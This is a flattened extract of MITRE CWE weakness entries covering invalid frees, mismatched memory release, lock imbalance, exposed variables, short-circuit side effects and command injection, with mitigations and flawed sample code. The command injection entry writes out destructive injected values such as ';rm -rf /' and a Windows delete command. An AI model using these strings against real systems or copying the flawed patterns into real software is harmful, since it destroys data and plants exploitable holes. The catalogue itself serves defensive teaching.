Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2013-02-21 - updated Description, Potential_Mitigations, References, Relationships, Type - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes - - - - - The application calls free() on a pointer to a memory resource that was allocated on the heap, but the pointer is not at the start of the buffer. - - This can cause the application to crash, or in some cases, modify critical program variables or execute code. - This weakness often occurs when the memory is allocated explicitly on the heap with one of the malloc() family functions and free() is called, but pointer arithmetic has caused the pointer to be in the interior or end of the buffer. - - - - - - - - Implementation - - - - - Integrity - Availability - Confidentiality - Modify Memory - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - - - - - Implementation - When utilizing pointer arithmetic to traverse a buffer, use a separate variable to track progress through memory and preserve the originally allocated address for later freeing. - - - Implementation - When programming in C++, consider using smart pointers provided by the boost library to help correctly and consistently manage memory. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, glibc in Linux provides protection against free of invalid pointers. - - - - Architecture and Design - Use a language that provides abstractions for memory allocation and deallocation. - - - Testing - Use a tool that dynamically detects memory management problems, such as valgrind. - - - - - In this example, the programmer dynamically allocates a buffer to hold a string and then searches for a specific character. After completing the search, the programmer attempts to release the allocated memory and return SUCCESS or FAILURE to the caller. Note: for simplification, this example uses a hard-coded "Search Me!" string and a constant string length of 20. - - #define SUCCESS (1)#define FAILURE (0) - int contains_char(char c){ - char *str;str = (char*)malloc(20*sizeof(char));strcpy(str, "Search Me!");while( *str != NULL){ - if( *str == c ){ - - - /* matched char, free string and return success */ - free(str);return SUCCESS; - } - /* didn't match yet, increment pointer and try next char */ - - str = str + 1; - } - /* we did not match the char in the string, free mem and return failure */ - - free(str);return FAILURE; - } - - However, if the character is not at the beginning of the string, or if it is not in the string at all, then the pointer will not be at the start of the buffer when the programmer frees it. - Instead of freeing the pointer in the middle of the buffer, the programmer can use an indexing pointer to step through the memory or abstract the memory calculations by using array indexing. - - #define SUCCESS (1)#define FAILURE (0) - int cointains_char(char c){ - char *str;int i = 0;str = (char*)malloc(20*sizeof(char));strcpy(str, "Search Me!");while( i < strlen(str) ){ - if( str[i] == c ){ - - - /* matched char, free string and return success */ - free(str);return SUCCESS; - } - /* didn't match yet, increment pointer and try next char */ - - i = i + 1; - } - /* we did not match the char in the string, free mem and return failure */ - - free(str);return FAILURE; - } - - - - This code attempts to tokenize a string and place it into an array using the strsep function, which inserts a \0 byte in place of whitespace or a tab character. After finishing the loop, each string in the AP array points to a location within the input string. - - char **ap, *argv[10], *inputstring;for (ap = argv; (*ap = strsep(&inputstring, " \t")) != NULL;) - if (**ap != '\0')if (++ap >= &argv[10])break; - - - - /.../free(ap[4]); - - Since strsep is not allocating any new memory, freeing an element in the middle of the array is equivalent to free a pointer in the middle of inputstring. - - - Consider the following code in the context of a parsing application to extract commands out of user data. The intent is to parse each command and add it to a queue of commands to be executed, discarding each malformed entry. - - - - //hardcode input length for simplicity - char* input = (char*) malloc(40*sizeof(char));char *tok;char* sep = " \t"; - get_user_input( input ); - - /* The following loop will parse and process each token in the input string */ - - tok = strtok( input, sep);while( NULL != tok ){ - if( isMalformed( tok ) ){ - - - /* ignore and discard bad data */ - free( tok ); - }else{add_to_command_queue( tok );}tok = strtok( NULL, sep)); - } - - While the above code attempts to free memory associated with bad commands, since the memory was all allocated in one chunk, it must all be freed together. - One way to fix this problem would be to copy the commands into a new memory location before placing them in the queue. Then, after all commands have been processed, the memory can safely be freed. - - - - //hardcode input length for simplicity - char* input = (char*) malloc(40*sizeof(char));char *tok, *command;char* sep = " \t"; - get_user_input( input ); - - /* The following loop will parse and process each token in the input string */ - - tok = strtok( input, sep);while( NULL != tok ){ - if( !isMalformed( command ) ){ - - - /* copy and enqueue good data */ - command = (char*) malloc( (strlen(tok) + 1) * sizeof(char) );strcpy( command, tok );add_to_command_queue( command ); - }tok = strtok( NULL, sep)); - } - free( input ) - - - - - - CVE-2019-11930 - function "internally calls 'calloc' and returns a pointer at an index... inside the allocated buffer. This led to freeing invalid memory." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11930 - - - - Memory - - - - SFP12 - Faulty Memory Release - - - - - - - - Currently, CWE-763 is the parent, however it may be desirable to have an intermediate parent which is not function-specific, similar to how CWE-762 is an intermediate parent between CWE-763 and CWE-590. - - - - CWE Content Team - MITRE - 2009-05-08 - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Observed_Examples - - - - - The application attempts to return a memory resource to the system, but it calls a release function that is not compatible with the function that was originally used to allocate that resource. - - This weakness can be generally described as mismatching memory management routines, such as: - - - The memory was allocated on the stack (automatically), but it was deallocated using the memory management routine free() (CWE-590), which is intended for explicitly allocated heap memory. - The memory was allocated explicitly using one set of memory management functions, and deallocated using a different set. For example, memory might be allocated with malloc() in C++ instead of the new operator, and then deallocated with the delete operator. - - - When the memory management functions are mismatched, the consequences may be as severe as code execution, memory corruption, or program crash. Consequences and ease of exploit will vary depending on the implementation of the routines and the object being managed. - - - - - - - - - - - - Implementation - - - Low - - - Integrity - Availability - Confidentiality - Modify Memory - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - - - - - Implementation - Only call matching memory management functions. Do not mix and match routines. For example, when you allocate a buffer with malloc(), dispose of the original pointer with free(). - - - Implementation - Libraries or Frameworks - - Choose a language or tool that provides automatic memory management, or makes manual memory management less error-prone. - For example, glibc in Linux provides protection against free of invalid pointers. - When using Xcode to target OS X or iOS, enable automatic reference counting (ARC) [REF-391]. - To help correctly and consistently manage memory when programming in C++, consider using a smart pointer class such as std::auto_ptr (defined by ISO/IEC ISO/IEC 14882:2003), std::shared_ptr and std::unique_ptr (specified by an upcoming revision of the C++ standard, informally referred to as C++ 1x), or equivalent solutions such as Boost. - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, glibc in Linux provides protection against free of invalid pointers. - - - - Architecture and Design - Use a language that provides abstractions for memory allocation and deallocation. - - - Testing - Use a tool that dynamically detects memory management problems, such as valgrind. - - - - - This example allocates a BarObj object using the new operator in C++, however, the programmer then deallocates the object using free(), which may lead to unexpected behavior. - - void foo(){ - BarObj *ptr = new BarObj() - /* do some work with ptr here */ - - ... - free(ptr); - } - - Instead, the programmer should have either created the object with one of the malloc family functions, or else deleted the object with the delete operator. - - void foo(){ - BarObj *ptr = new BarObj() - /* do some work with ptr here */ - - ... - delete ptr; - } - - - - In this example, the program does not use matching functions such as malloc/free, new/delete, and new[]/delete[] to allocate/deallocate the resource. - - class A {void foo();};void A::foo(){int *ptr;ptr = (int*)malloc(sizeof(int));delete ptr;} - - - - In this example, the program calls the delete[] function on non-heap memory. - - class A{void foo(bool);};void A::foo(bool heap) {int localArray[2] = {11,22};int *p = localArray;if (heap){p = new int[2];}delete[] p;} - - - - - Memory - - - - WIN30-C - Properly pair allocation and deallocation functions - Exact - - - SFP12 - Faulty Memory Release - - - - - - - - - - This weakness is possible in any programming language that allows manual management of memory. - - - - - CWE Content Team - MITRE - 2009-05-08 - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Likelihood_of_Exploit - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - Martin Sebor - Cisco Systems, Inc. - 2010-04-30 - Provided improvement to existing Mitigation - - - - - The application attempts to return a memory resource to the system, but calls the wrong release function or calls the appropriate release function incorrectly. - - This weakness can take several forms, such as: - - - The memory was allocated, explicitly or implicitly, via one memory management method and deallocated using a different, non-compatible function (CWE-762). - The function calls or memory management routines chosen are appropriate, however they are used incorrectly, such as in CWE-761. - - - - - - - - - - - Implementation - - - - - Integrity - Availability - Confidentiality - Modify Memory - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - This weakness may result in the corruption of memory, and perhaps instructions, possibly leading to a crash. If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. - - - - - Implementation - Only call matching memory management functions. Do not mix and match routines. For example, when you allocate a buffer with malloc(), dispose of the original pointer with free(). - - - Implementation - When programming in C++, consider using smart pointers provided by the boost library to help correctly and consistently manage memory. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, glibc in Linux provides protection against free of invalid pointers. - - - - Architecture and Design - Use a language that provides abstractions for memory allocation and deallocation. - - - Testing - Use a tool that dynamically detects memory management problems, such as valgrind. - - - - - This code attempts to tokenize a string and place it into an array using the strsep function, which inserts a \0 byte in place of whitespace or a tab character. After finishing the loop, each string in the AP array points to a location within the input string. - - char **ap, *argv[10], *inputstring;for (ap = argv; (*ap = strsep(&inputstring, " \t")) != NULL;) - if (**ap != '\0')if (++ap >= &argv[10])break; - - - - /.../free(ap[4]); - - Since strsep is not allocating any new memory, freeing an element in the middle of the array is equivalent to free a pointer in the middle of inputstring. - - - This example allocates a BarObj object using the new operator in C++, however, the programmer then deallocates the object using free(), which may lead to unexpected behavior. - - void foo(){ - BarObj *ptr = new BarObj() - /* do some work with ptr here */ - - ... - free(ptr); - } - - Instead, the programmer should have either created the object with one of the malloc family functions, or else deleted the object with the delete operator. - - void foo(){ - BarObj *ptr = new BarObj() - /* do some work with ptr here */ - - ... - delete ptr; - } - - - - In this example, the programmer dynamically allocates a buffer to hold a string and then searches for a specific character. After completing the search, the programmer attempts to release the allocated memory and return SUCCESS or FAILURE to the caller. Note: for simplification, this example uses a hard-coded "Search Me!" string and a constant string length of 20. - - #define SUCCESS (1)#define FAILURE (0) - int contains_char(char c){ - char *str;str = (char*)malloc(20*sizeof(char));strcpy(str, "Search Me!");while( *str != NULL){ - if( *str == c ){ - - - /* matched char, free string and return success */ - free(str);return SUCCESS; - } - /* didn't match yet, increment pointer and try next char */ - - str = str + 1; - } - /* we did not match the char in the string, free mem and return failure */ - - free(str);return FAILURE; - } - - However, if the character is not at the beginning of the string, or if it is not in the string at all, then the pointer will not be at the start of the buffer when the programmer frees it. - Instead of freeing the pointer in the middle of the buffer, the programmer can use an indexing pointer to step through the memory or abstract the memory calculations by using array indexing. - - #define SUCCESS (1)#define FAILURE (0) - int cointains_char(char c){ - char *str;int i = 0;str = (char*)malloc(20*sizeof(char));strcpy(str, "Search Me!");while( i < strlen(str) ){ - if( str[i] == c ){ - - - /* matched char, free string and return success */ - free(str);return SUCCESS; - } - /* didn't match yet, increment pointer and try next char */ - - i = i + 1; - } - /* we did not match the char in the string, free mem and return failure */ - - free(str);return FAILURE; - } - - - - Consider the following code in the context of a parsing application to extract commands out of user data. The intent is to parse each command and add it to a queue of commands to be executed, discarding each malformed entry. - - - - //hardcode input length for simplicity - char* input = (char*) malloc(40*sizeof(char));char *tok;char* sep = " \t"; - get_user_input( input ); - - /* The following loop will parse and process each token in the input string */ - - tok = strtok( input, sep);while( NULL != tok ){ - if( isMalformed( tok ) ){ - - - /* ignore and discard bad data */ - free( tok ); - }else{add_to_command_queue( tok );}tok = strtok( NULL, sep)); - } - - While the above code attempts to free memory associated with bad commands, since the memory was all allocated in one chunk, it must all be freed together. - One way to fix this problem would be to copy the commands into a new memory location before placing them in the queue. Then, after all commands have been processed, the memory can safely be freed. - - - - //hardcode input length for simplicity - char* input = (char*) malloc(40*sizeof(char));char *tok, *command;char* sep = " \t"; - get_user_input( input ); - - /* The following loop will parse and process each token in the input string */ - - tok = strtok( input, sep);while( NULL != tok ){ - if( !isMalformed( command ) ){ - - - /* copy and enqueue good data */ - command = (char*) malloc( (strlen(tok) + 1) * sizeof(char) );strcpy( command, tok );add_to_command_queue( command ); - }tok = strtok( NULL, sep)); - } - free( input ) - - - - - Memory - - - - SFP12 - Faulty Memory Release - - - - - - - - The view-1000 subtree that is associated with this weakness needs additional work. Several entries will likely be created in this branch. Currently the focus is on free() of memory, but delete and other related release routines may require the creation of intermediate entries that are not specific to a particular function. In addition, the role of other types of invalid pointers, such as an expired pointer, i.e. CWE-415 Double Free and release of uninitialized pointers, related to CWE-457. - - - - CWE Content Team - MITRE - 2009-05-08 - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - The software locks a critical resource more times than intended, leading to an unexpected state in the system. - When software is operating in a concurrent environment and repeatedly locks a critical resource, the consequences will vary based on the type of lock, the lock's implementation, and the resource being protected. In some situations such as with semaphores, the resources are pooled and extra locking calls will reduce the size of the total available pool, possibly leading to degraded performance or a denial of service. If this can be triggered by an attacker, it will be similar to an unrestricted lock (CWE-412). In the context of a binary lock, it is likely that any duplicate locking attempts will never succeed since the lock is already held and progress may not be possible. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Availability - Integrity - DoS: Resource Consumption (CPU) - DoS: Crash, Exit, or Restart - Unexpected State - - - - - Implementation - When locking and unlocking a resource, try to be sure that all control paths through the code in which the resource is locked one or more times correspond to exactly as many unlocks. If the software acquires a lock and then determines it is not able to perform its intended behavior, be sure to release the lock(s) before waiting for conditions to improve. Reacquire the lock(s) before trying again. - - - - - SFP21 - Multiple locks/unlocks - - - - An alternate way to think about this weakness is as an imbalance between the number of locks / unlocks in the control flow. Over the course of execution, if each lock call is not followed by a subsequent call to unlock in a reasonable amount of time, then system performance may be degraded or at least operating at less than peak levels if there is competition for the locks. This entry may need to be modified to reflect these concepts in the future. - - - - CWE Content Team - MITRE - 2009-03-03 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software unlocks a critical resource more times than intended, leading to an unexpected state in the system. - When software is operating in a concurrent environment and repeatedly unlocks a critical resource, the consequences will vary based on the type of lock, the lock's implementation, and the resource being protected. In some situations such as with semaphores, the resources are pooled and extra calls to unlock will increase the count for the number of available resources, likely resulting in a crash or unpredictable behavior when the system nears capacity. - - - - - - - Implementation - - - - - Availability - Integrity - DoS: Crash, Exit, or Restart - Modify Memory - Unexpected State - - - - - Implementation - When locking and unlocking a resource, try to be sure that all control paths through the code in which the resource is locked one or more times correspond to exactly as many unlocks. If the software acquires a lock and then determines it is not able to perform its intended behavior, be sure to release the lock(s) before waiting for conditions to improve. Reacquire the lock(s) before trying again. - - - - - CVE-2009-0935 - Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0935 - - - - - SFP21 - Multiple locks/unlocks - - - - An alternate way to think about this weakness is as an imbalance between the number of locks / unlocks in the control flow. Over the course of execution, if each lock call is not followed by a subsequent call to unlock in a reasonable amount of time, then system performance may be degraded or at least operating at less than peak levels if there is competition for the locks. This entry may need to be modified to reflect these concepts in the future. - - - - CWE Content Team - MITRE - 2009-03-03 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software declares a critical variable, field, or member to be public when intended security policy requires it to be private. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Primary - - - Indirect - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Confidentiality - Read Application Data - Modify Application Data - Making a critical variable public allows anyone with access to the object in which the variable is contained to alter or read the value. - - - Other - Reduce Maintainability - - - - - Implementation - Data should be private, static, and final whenever possible. This will assure that your code is protected by instantiating early, preventing access, and preventing tampering. - - - - - The following example declares a critical variable public, making it accessible to anyone with access to the object in which it is contained. - - public: char* password; - - Instead, the critical data should be declared private. - - private: char* password; - - Even though this example declares the password to be private, there are other possible issues with this implementation, such as the possibility of recovering the password from process memory (CWE-257). - - - The following example shows a basic user account class that includes member variables for the username and password as well as a public constructor for the class and a public method to authorize access to the user account. - - #define MAX_PASSWORD_LENGTH 15#define MAX_USERNAME_LENGTH 15 - class UserAccount{ - public: - UserAccount(char *username, char *password){if ((strlen(username) > MAX_USERNAME_LENGTH) ||(strlen(password) > MAX_PASSWORD_LENGTH)) {ExitError("Invalid username or password");}strcpy(this->username, username);strcpy(this->password, password);} - - - int authorizeAccess(char *username, char *password){ - if ((strlen(username) > MAX_USERNAME_LENGTH) ||(strlen(password) > MAX_PASSWORD_LENGTH)) {ExitError("Invalid username or password");} - // if the username and password in the input parameters are equal to - - - // the username and password of this account class then authorize access - if (strcmp(this->username, username) ||strcmp(this->password, password))return 0; - - // otherwise do not authorize access - elsereturn 1; - - } - char username[MAX_USERNAME_LENGTH+1];char password[MAX_PASSWORD_LENGTH+1]; - }; - - However, the member variables username and password are declared public and therefore will allow access and changes to the member variables to anyone with access to the object. These member variables should be declared private as shown below to prevent unauthorized access and changes. - - class UserAccount{public:... - - private:char username[MAX_USERNAME_LENGTH+1];char password[MAX_PASSWORD_LENGTH+1];}; - - - - - - CVE-2010-3860 - variables declared public allows remote read of system properties such as user name and home directory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3860 - - - - - Failure to protect stored data from modification - - - OBJ01-J - Declare data members as private and provide accessible wrapper methods - - - SFP28 - Unexpected access points - - - ASCMM-MNT-15 - - - - - - - - CWE Content Team - MITRE - 2009-03-03 - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Common_Consequences, Description, Name, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Critical Variable Declared Public - - - - The software defines a public method that reads or modifies a private variable. - If an attacker modifies the variable to contain unexpected values, this could violate assumptions from other parts of the code. Additionally, if an attacker can read the private variable, it may expose sensitive information or make it easier to launch further attacks. - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Other - Modify Application Data - Other - - - - - Implementation - Use class accessor and mutator methods appropriately. Perform validation when accepting data from a public method that is intended to modify a critical private variable. Also be sure that appropriate access controls are being applied when a public method interfaces with critical data. - - - - - The following example declares a critical variable to be private, and then allows the variable to be modified by public methods. - - private: float price;public: void changePrice(float newPrice) {price = newPrice;} - - - - The following example could be used to implement a user forum where a single user (UID) can switch between multiple profiles (PID). - - public class Client {private int UID;public int PID;private String userName;public Client(String userName){PID = getDefaultProfileID();UID = mapUserNametoUID( userName );this.userName = userName;}public void setPID(int ID) {UID = ID;}} - - The programmer implemented setPID with the intention of modifying the PID variable, but due to a typo. accidentally specified the critical variable UID instead. If the program allows profile IDs to be between 1 and 10, but a UID of 1 means the user is treated as an admin, then a user could gain administrative privileges as a result of this typo. - - - - - Failure to protect stored data from modification - - - SFP23 - Exposed Data - - - OOP31-PL - Do not access private variables or subroutines in other packages - Imprecise - - - - This entry is closely associated with access control for public methods. If the public methods are restricted with proper access controls, then the information in the private variable will not be exposed to unexpected parties. There may be chaining or composite relationships between improper access controls and this weakness. - - - - CWE Content Team - MITRE - 2009-03-03 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - The software contains a conditional statement with multiple logical expressions in which one of the non-leading expressions may produce side effects. This may lead to an unexpected state in the program after the execution of the conditional, because short-circuiting logic may prevent the side effects from occurring. - - Usage of short circuit evaluation, though well-defined in the C standard, may alter control flow in a way that introduces logic errors that are difficult to detect, possibly causing errors later during the software's execution. If an attacker can discover such an inconsistency, it may be exploitable to gain arbitrary control over a system. - If the first condition of an "or" statement is assumed to be true under normal circumstances, or if the first condition of an "and" statement is assumed to be false, then any subsequent conditional may contain its own logic errors that are not detected during code review or testing. - Finally, the usage of short circuit evaluation may decrease the maintainability of the code. - - - - - - - Implementation - - - Low - - - Confidentiality - Integrity - Availability - Widely varied consequences are possible if an attacker is aware of an unexpected state in the software after a conditional. It may lead to information exposure, a system crash, or even complete attacker control of the system. - - - - - Implementation - Minimizing the number of statements in a conditional that produce side effects will help to prevent the likelihood of short circuit evaluation to alter control flow in an unexpected way. - - - - - The following function attempts to take a size value from a user and allocate an array of that size (we ignore bounds checking for simplicity). The function tries to initialize each spot with the value of its index, that is, A[len-1] = len - 1; A[len-2] = len - 2; ... A[1] = 1; A[0] = 0; However, since the programmer uses the prefix decrement operator, when the conditional is evaluated with i == 1, the decrement will result in a 0 value for the first part of the predicate, causing the second portion to be bypassed via short-circuit evaluation. This means we cannot be sure of what value will be in A[0] when we return the array to the user. - - #define PRIV_ADMIN 0#define PRIV_REGULAR 1typedef struct{int privileges;int id;} user_t;user_t *Add_Regular_Users(int num_users){user_t* users = (user_t*)calloc(num_users, sizeof(user_t));int i = num_users;while( --i && (users[i].privileges = PRIV_REGULAR) ){users[i].id = i;}return users;}int main(){user_t* test;int i;test = Add_Regular_Users(25);for(i = 0; i < 25; i++) printf("user %d has privilege level %d\n", test[i].id, test[i].privileges);} - - When compiled and run, the above code will output a privilege level of 1, or PRIV_REGULAR for every user but the user with id 0 since the prefix increment operator used in the if statement will reach zero and short circuit before setting the 0th user's privilege level. Since we used calloc, this privilege will be set to 0, or PRIV_ADMIN. - - - - - Failure to protect stored data from modification - - - SFP1 - Glitch in computation - - - - - CWE Content Team - MITRE - 2009-03-03 - - - CWE Content Team - MITRE - 2010-09-27 - updated Description - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This entry has been deprecated because it was a duplicate of CWE-774. All content has been transferred to CWE-774. - - - CWE Content Team - MITRE - 2009-05-08 - - - CWE Content Team - MITRE - 2010-04-05 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2013-02-21 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Alternate_Terms, Description, Likelihood_of_Exploit, Name, Relationships, Type - - - CWE Content Team - MITRE - 2019-01-03 - updated Alternate_Terms, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships, Time_of_Introduction, Type - - File Descriptor Exhaustion - Uncontrolled File Descriptor Consumption - - - - The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. - - Command injection vulnerabilities typically occur when: - - 1. Data enters the application from an untrusted source. - 2. The data is part of a string that is executed as a command by the application. - 3. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have. - - Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attacks. - Command injection is a common problem with wrapper programs. - - - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - If a malicious user injects a character (such as a semi-colon) that delimits the end of one command and the beginning of another, it may be possible to then insert an entirely new and unrelated command that was not intended to be executed. - - - - - Architecture and Design - If at all possible, use library calls rather than external processes to recreate the desired functionality. - - - Implementation - If possible, ensure that all external commands called from the program are statically created. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Operation - Run time: Run time policy enforcement may be used in an allowlist fashion to prevent use of any non-sanctioned commands. - - - System Configuration - Assign permissions to the software system that prevents the user from accessing/opening privileged files. - - - - - The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system. - - int main(int argc, char** argv) {char cmd[CMD_MAX] = "/usr/bin/cat ";strcat(cmd, argv[1]);system(cmd);} - - Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form ";rm -rf /", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition. - Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120). - - - The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user. - - ...String btype = request.getParameter("backuptype");String cmd = new String("cmd.exe /K \"c:\\util\\rmanDB.bat "+btype+"&&c:\\utl\\cleanup.bat\"") - System.Runtime.getRuntime().exec(cmd);... - - The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form "& del c:\\dbms\\*.*", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges 